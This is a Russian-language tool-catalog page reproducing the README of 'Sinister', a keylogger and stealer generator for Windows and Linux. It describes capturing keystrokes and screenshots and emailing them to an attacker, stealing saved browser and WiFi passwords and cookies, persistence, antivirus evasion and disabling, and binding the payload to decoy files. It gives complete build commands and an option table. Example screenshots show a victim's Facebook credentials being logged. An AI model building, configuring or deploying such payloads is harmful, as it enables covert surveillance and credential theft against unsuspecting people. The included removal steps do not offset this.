Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Sinister — Sinister — это генератор кейлоггеров для Windows/Linux, который отправляет записанные нажатия клавиш по электронной почте вместе с другой ценной информацией о цели. | Kitploit
Инструменты/GitHubGitHub/pushpenderindia/sinister
Взлом паролейГенерация полезной нагрузкиМеханизмы персистентностиЭксфильтрация данныхСбор информацииПост-эксплуатацияRed TeamingИнструмент Удаленного Доступа
GitHubpushpenderindia/sinister

Sinister

Sinister — это генератор кейлоггеров для Windows/Linux, который отправляет записанные нажатия клавиш по электронной почте вместе с другой ценной информацией о цели.

Репозиторий
465931 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Логотип Sinister

Sinister

GIF хакера

root@kitploit:~
                    Этот небольшой скрипт на Python может творить действительно потрясающие вещи.

Sinister — это генератор кейлоггеров для Windows/Linux, который отправляет нажатия клавиш и скриншоты по электронной почте, а также другую ценную информацию о цели, написанный на Python 3.

Отказ от ответственности

:computer: Этот проект создан исключительно в благих целях и для личного использования.

ДАННОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ПРЕДОСТАВЛЯЕТСЯ «КАК ЕСТЬ» БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ. ВЫ ИСПОЛЬЗУЕТЕ ЭТО ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ НА СВОЙ СОБСТВЕННЫЙ РИСК. ИСПОЛЬЗОВАНИЕ ЯВЛЯЕТСЯ ПОЛНОЙ ОТВЕТСТВЕННОСТЬЮ КОНЕЧНОГО ПОЛЬЗОВАТЕЛЯ. РАЗРАБОТЧИКИ НЕ НЕСУТ НИКАКОЙ ОТВЕТСТВЕННОСТИ И НЕ НЕСУТ ОТВЕТСТВЕННОСТИ ЗА ЛЮБОЕ НЕПРАВИЛЬНОЕ ИСПОЛЬЗОВАНИЕ ИЛИ УЩЕРБ, ПРИЧИНЕННЫЙ ДАННОЙ ПРОГРАММОЙ.

Возможности

  • Работает на Windows/Linux
  • Уведомление о новой жертве по электронной почте
  • Необнаруживаемость
  • Постоянство (Persistence)
  • Проверка учётных данных электронной почты перед генерацией полезной нагрузки.
  • Возможность получать журналы нажатий клавиш в любом почтовом провайдере, таком как GMAIL, YAHOO, OUTLOOK, Custom SMTP.
  • SMTP-сервер / Порт
Имя сервераSMTP-серверSMTP-порт
GMAILsmtp.gmail.com587
OUTLOOKsmtp-mail.outlook.com587
YAHOOsmtp.mail.yahoo.com587
  • Отправка скриншота экрана ПК жертвы по электронной почте
  • Создание исполняемого двоичного файла с нулевыми зависимостями
  • Создание полезной нагрузки малого размера (~5 МБ) с расширенной функциональностью
  • Обфускация полезной нагрузки перед генерацией, что позволяет обходить некоторые антивирусы
  • Сгенерированная полезная нагрузка кодируется в base64, что делает обратную разработку чрезвычайно сложной
  • Функция уничтожения антивируса на ПК жертвы и попытка отключить систему безопасности
  • Отличный цветной интерфейс для генерации полезной нагрузки
  • На стороне атакующего: при создании полезной нагрузки скрипт автоматически обнаруживает отсутствующие зависимости и устанавливает их
  • Различие данных журнала на основе имени активного окна (См. изображение для лучшего понимания)
  • Возможность добавления собственной иконки к вредоносному файлу
  • Встроенный байндер (Binder), который может привязать кейлоггер к любому файлу [.pdf, .txt, .exe и т.д.], запуская легитимный файл на переднем плане, а вредоносный код — в фоновом режиме как служба.
  • Проверка на в системе. Если запущенный экземпляр найден, выполняется только легитимный файл [ для предотвращения получения дублирующихся почтовых журналов].
Встроенный стилер может украсть следующее:
Браузер Chrome (сохранённые пароли)
WiFi (сохранённые пароли)
Файлы cookie Chrome (данные для входа, куки, история)
Файлы cookie Firefox (cookies.sqlite)

Примечание: Стилер написан с нуля, не полагается на LaZagne

  • Сбор и отправка полезной информации об устройстве жертвы
Собирается и отправляется:
Операционная система
Имя компьютера
Имя пользователя
Публичный IPv4-адрес
  • Если ваша полезная нагрузка не выполняется, укажите --debug для запуска exe на переднем плане с CMD

Важно

30 мая 2022 года Google удалил функцию «менее безопасных приложений», поэтому вместо пароля Gmail:

  • Включите двухфакторную аутентификацию (2FA) на вашем аккаунте атакующего Gmail
  • Создайте пароль приложения
  • Используйте этот пароль приложения при создании полезной нагрузки.
  • Как создать пароль приложения: Нажмите здесь

Протестировано на

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Предварительные требования

  • Python 3.X
  • Несколько внешних модулей

Использование в Linux

root@kitploit:~
# Перейдите в каталог /opt (необязательно)
$ cd /opt/

# Клонируйте этот репозиторий
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Перейдите в папку Sinister
$ cd Sinister

# Установка зависимостей
$ bash installer_linux.sh

*** Примечание: Когда появится диалоговое окно установщика Python при выполнении installer_linux.sh ***
    * Нажмите custom install 
    * Выберите Путь: C:/Python37-32
    ### Таким образом, Python будет установлен по этому пути (внутри Wine): ~/.wine/drive_c/Python37-32

# Если вы получаете ошибки при выполнении installer_linux.sh, попробуйте установить с помощью installer_linux.py
$ python3 installer_linux.py

$ chmod +x Sinister.py
$ python3 Sinister.py --help

# Создание полезной нагрузки/RAT
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Создание полезной нагрузки с использованием SMTP-сервера GMAIL, конфигурации порта (SMTP-сервер по умолчанию = smtp.gmail.com, SMTP-порт по умолчанию = 587)
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Создание полезной нагрузки с использованием SMTP-сервера OUTLOOK, конфигурации порта
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -l -o output_file_name --icon icon_path

# Создание полезной нагрузки с использованием SMTP-сервера YAHOO, конфигурации порта
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -l -o output_file_name --icon icon_path

Примечание: Вы также можете использовать наши пользовательские иконки из папки icon, просто используйте их так: --icon icon/pdf.ico

Использование в Windows

root@kitploit:~
# Установка зависимостей 
$ Установите последнюю версию python 3.x

# Клонируйте этот репозиторий
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Перейдите в репозиторий
$ cd Sinister

# Установка зависимостей
$ python -m pip install -r requirements.txt

# Откройте Sinister.py в текстовом редакторе и настройте строку 16 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe" 

# Получение справки
$ python Sinister.py --help

# Создание полезной нагрузки/RAT
$ python Sinister.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# Создание полезной нагрузки с использованием SMTP-сервера GMAIL, конфигурации порта (SMTP-сервер по умолчанию = smtp.gmail.com, SMTP-порт по умолчанию = 587)
$ python Sinister.py -e [email protected] -p YourEmailPass-w -o output_file_name --icon icon_path

# Создание полезной нагрузки с использованием SMTP-сервера OUTLOOK, конфигурации порта
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -w -o output_file_name --icon icon_path

# Создание полезной нагрузки с использованием SMTP-сервера YAHOO, конфигурации порта
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -w -o output_file_name --icon icon_path

Примечание: Вы также можете использовать наши пользовательские иконки из папки icon, просто используйте их так: --icon icon/pdf.ico

Как обновить

  • Запустите updater.py для автоматического обновления или скачайте последний ZIP-архив из этого репозитория GitHub
  • Примечание: Git должен быть установлен для использования updater.py

Примечание: Вредоносный файл будет сохранён в папке dist/, внутри папки Sinister/

Доступные аргументы

  • Необязательные аргументы

Примечание: Необходимо указать либо -w/--windows, либо -l/--linux

  • Обязательные аргументы

Новые скриншоты:

Получение справки

Генерация полезной нагрузки

Получение отчёта

Данные журнала различаются на основе имени активного окна ~ Функция добавлена в версию 1.3 и выше

Извлекает и отправляет сохранённые пароли браузера Chrome

  • Примечание: Чтобы использовать эту функцию, укажите -s или --steal-password при создании кейлоггера

Извлекает и отправляет сохранённые пароли WiFi

  • Примечание: Чтобы использовать эту функцию, укажите -s или --steal-password при создании кейлоггера

Также обратитесь к этим старым изображениям

~Старые скриншоты:

Получение справки

Запуск скрипта Sinister.py

Сборка завершена

Когда кейлоггер запускается, он добавляет запись в реестр для обеспечения постоянства

Создаёт свою копию и сохраняет её в папке Roaming

Ввод случайного текста для тестирования кейлоггера

Отчёт 1, отправленный Sinister

Вход в facebook ~ жертва

Отчёт 2 - нажатия клавиш учётных данных facebook

Отчёт 3 - со скриншотами

Отладка проблем

Попробуйте запустить Offline Keylogger, чтобы протестировать захват нажатий клавиш в офлайн-режиме и отладить проблемы с кейлоггером, выполнив эти команды:

Запустите test_key.py в обоих режимах [Скомпилированном и Исходном] и выясните, в чём ошибка

Запустите так: python test_key.py

Также скомпилируйте так: pyinstaller --onefile test_key.py --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=pynput.keyboard

После запуска начните что-нибудь печатать. Результат будет отображаться в командной строке каждые 10 секунд

Файлы офлайн-кейлоггера находятся в папке TestKeylogger

  • Если полезная нагрузка не выполняется в системе жертвы
root@kitploit:~
1. Создайте новую полезную нагрузку с флагом --debug
2. Запустите exe полезной нагрузки через cmd [Не запускайте полезную нагрузку двойным щелчком]
3. Теперь в CMD появится более подходящая ошибка; просто разместите эту проблему в разделе Issue

Удаление Sinister в Windows:

Метод 1:

  • Перейдите в «Пуск», введите regedit и запустите первую программу; откроется редактор реестра.
  • Перейдите по следующему пути: Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Там должна быть запись с именем svchost, щёлкните правой кнопкой мыши эту запись и выберите «Удалить».
  • Перейдите по пути пользователя > AppData > Roaming, вы увидите файл с именем «svchost.exe», это RAT — щёлкните правой кнопкой мыши > Удалить.
  • Перезагрузите систему.

Метод 2:

  • Запустите «RemoveSinister.bat» на заражённой системе, а затем перезагрузите ПК, чтобы остановить текущий запущенный вредоносный файл.

Удаление Sinister в Linux:

  • Откройте файл автозапуска любым текстовым редактором. Путь к файлу автозапуска: ~/.config/autostart/xinput.desktop

  • Удалите эти 5 строк:

    root@kitploit:~
       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="destination_file_name"
    
  • Примечание: destination_file_name — это имя вредоносного файла, которое вы дали своему кейлоггеру с помощью параметра -o

  • Перезагрузите систему и затем удалите вредоносный файл, хранящийся по следующему пути

  • Целевой путь, где хранится кейлоггер: ~/.config/xnput

Участники

  • Список основных участников: Contributors

Приветствуются любые виды вклада!

ПРИМЕЧАНИЕ: Если вы должны быть в списке участников, но мы вас забыли, дайте нам знать!

Планы (TODO)

  • Предложите свою собственную функцию
  • Добавить новые функции
  • Внести вклад в версию с графическим интерфейсом
Скачать инструмент
уже запущенный экземпляр
Запрет нескольких экземпляров
  • Атакующий может создать/скомпилировать как для Windows/Linux OS с использованием Linux, но может создать/скомпилировать только исполняемый файл Windows с использованием Windows
  • Извлекает сохранённые пароли из системы жертвы и отправляет их атакующему.
  • СокращениеПолная формаОписание
    -h--helpпоказать это справочное сообщение и выйти
    -i ИНТЕРВАЛ--interval ИНТЕРВАЛВремя между отчётами в секундах. по умолч.=120
    -t ВРЕМЯ_PERSISTENT--persistence ВРЕМЯ_PERSISTENTСтать постоянным через __ секунд. по умолч.=10
    -x SMTP_Сервер--smtpПользовательский SMTP-сервер. по умолч.="smtp.gmail.com"
    -y SMTP_Порт--portПользовательский SMTP-порт. по умолч.=587
    -w--windowsСоздать исполняемый файл Windows.
    -l--linuxСоздать исполняемый файл Linux.
    -s--steal-passwordУкрасть сохранённые пароли с машины жертвы [Поддерживаемая ОС: Windows]
    -b file.txt--bind ПУТЬ_К_ЛЕГИТИМНОМУ_ФАЙЛУ.pdfАвтобайндер: укажите путь к легитимному файлу. [Поддерживаемая ОС: Windows]
    -d--debugПолезная нагрузка будет запущена на переднем плане с окном CMD для получения соответствующей ошибки выполнения
    СокращениеПолная формаОписание
    --icon ICONУкажите путь к иконке, иконка вредоносного файла [Примечание: Должна быть .ico]
    -e EMAIL--email EMAILАдрес электронной почты для отправки отчётов.
    -p PASSWORD--password PASSWORDПароль для адреса электронной почты, указанного в аргументе -e.
    -o OUT--out OUTИмя выходного файла.

    Pushpender Singh

    :computer:

    Thomas Kunwar

    :computer:

    krasnova19

    :computer:

    sarchish5

    :computer:

    chiragcode11

    :computer:

    C4RR0T02

    :computer: